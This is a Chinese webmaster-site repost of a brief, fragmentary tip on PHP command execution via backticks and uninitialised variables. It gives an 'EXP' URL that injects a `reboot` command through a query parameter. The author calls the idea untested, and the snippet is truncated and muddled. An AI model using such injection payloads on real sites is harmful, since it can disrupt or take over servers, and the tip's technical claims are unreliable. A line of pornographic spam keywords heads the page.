亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長(zhǎng)網(wǎng)

17站長(zhǎng)網(wǎng) 首頁(yè) 安全 安全教程 查看內(nèi)容

PHP漏洞挖掘的一點(diǎn)思路

2022-9-24 10:14| 查看: 2416 |來(lái)源: 互聯(lián)網(wǎng)

$now1 = `date`; echo "Now date is: $now1"; ?> /* 利用PHP的反引號(hào)` (不明白的自己查資料反引號(hào)"`"的作用) 如果 $sec 變量未賦初 ...

$now1 = `date`;
echo "Now date is: $now1";
?> /*
利用PHP的反引號(hào)`   (不明白的自己查資料反引號(hào)"`"的作用)
如果 $sec 變量未賦初值,可能導(dǎo)致 shell_exec 執(zhí)行系統(tǒng)指令
*/

echo "$sec"; // 同理這個(gè)也可能. echo $sec;
?> EXP:
http://forum.eviloctal.com/exp.php?sec=`reboot`
這樣只會(huì)把 $sec 當(dāng)作變量來(lái)處理, 需要適當(dāng)?shù)淖兺ㄒ幌隆!!? 今天翻書時(shí)無(wú)意間發(fā)現(xiàn)的,還沒(méi)測(cè)試,有興趣的朋友可以研究下。 PS:
變量在內(nèi)存中初始化,一直保存在內(nèi)存中。 未unset, 就可以讀取!

tag標(biāo)簽:PHP漏洞
本文最后更新于 2022-9-24 10:14,某些文章具有時(shí)效性,若有錯(cuò)誤或已失效,請(qǐng)?jiān)诰W(wǎng)站留言或聯(lián)系站長(zhǎng):17tui@17tui.com
·END·
站長(zhǎng)網(wǎng)微信號(hào):w17tui,關(guān)注站長(zhǎng)、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營(yíng)銷服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來(lái)自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識(shí),文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請(qǐng)勿用于商業(yè)用途,如果損害了您的權(quán)利,請(qǐng)聯(lián)系我們及時(shí)修正或刪除。謝謝!

17站長(zhǎng)網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長(zhǎng)、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長(zhǎng)轉(zhuǎn)型升級(jí),為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營(yíng)銷服務(wù),與站長(zhǎng)一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!

掃一掃,關(guān)注站長(zhǎng)網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部